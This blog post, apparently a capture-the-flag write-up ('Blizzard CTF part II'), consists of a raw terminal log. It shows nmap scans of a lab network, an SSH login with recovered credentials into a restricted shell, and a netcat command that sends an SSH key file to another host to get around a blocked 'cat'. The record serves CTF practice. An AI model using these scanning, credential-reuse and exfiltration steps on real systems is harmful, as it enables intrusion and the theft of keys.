Friday, February 11, 2022

Blizzard CTF - part II

 
  201  sendEmail -f "services@lethallab.com" -t admin@lethallab.com -u "Top secret stuff" -m "Here are the minutes from the last meeting. The password is: hacker" -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass]

root@kali2:~# cat p@5\$w0rd.txt
blizzard{RightOnTarget}

User: Tracer
Pass: RightOnTarget

root@kali2:~# nmap --script=dns-service-discovery -p 53 10.0.2.33

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:35 PST
Nmap scan report for 10.0.2.33
Host is up (0.00039s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds
root@kali2:~# nmap --script=dns-service-discovery -p 53 10.0.2.0/24

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:35 PST
Nmap scan report for scoreboard.local (10.0.2.10)
Host is up (0.00052s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.33
Host is up (0.00044s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.80
Host is up (0.00052s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.81
Host is up (0.00050s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.92
Host is up (0.00048s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.128
Host is up (0.00043s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.163
Host is up (0.00053s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.168
Host is up (0.00029s latency).
PORT   STATE  SERVICE
53/tcp closed domain

Nmap scan report for 10.0.2.203
Host is up (0.00044s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap scan report for 10.0.2.204
Host is up (0.00047s latency).
PORT   STATE    SERVICE
53/tcp filtered domain

Nmap done: 256 IP addresses (10 hosts up) scanned in 4.06 seconds
 

root@kali2:~# nmap --dns-server -sL 10.0.2.33

Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-05 15:37 PST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.0.2.33
Host is up (0.00047s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
4848/tcp  open  appserv-http
12345/tcp open  netbus

Nmap done: 1 IP address (1 host up) scanned in 4.41 seconds
root@kali2:~# ssh Tracer@10.0.2.33
Tracer@10.0.2.33's password:
Permission denied, please try again.
Tracer@10.0.2.33's password:

[1]+  Stopped                 ssh Tracer@10.0.2.33

root@kali2:~# ssh tracer@10.0.2.33
tracer@10.0.2.33's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-97-generic x86_64)

Last login: Sun Nov  5 15:36:47 2017 from 10.0.4.20
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
tracer:~$ ls
sombra_id_rsa  sombra_id_rsa.pub
tracer:~$ cat sombra_id_rsa.pub
*** forbidden command: cat
tracer:~$ nc 10.0.4.3 1234 < sombra_id_rsa.pub
tracer:~$ Write failed: Broken pipe
root@kali2:~#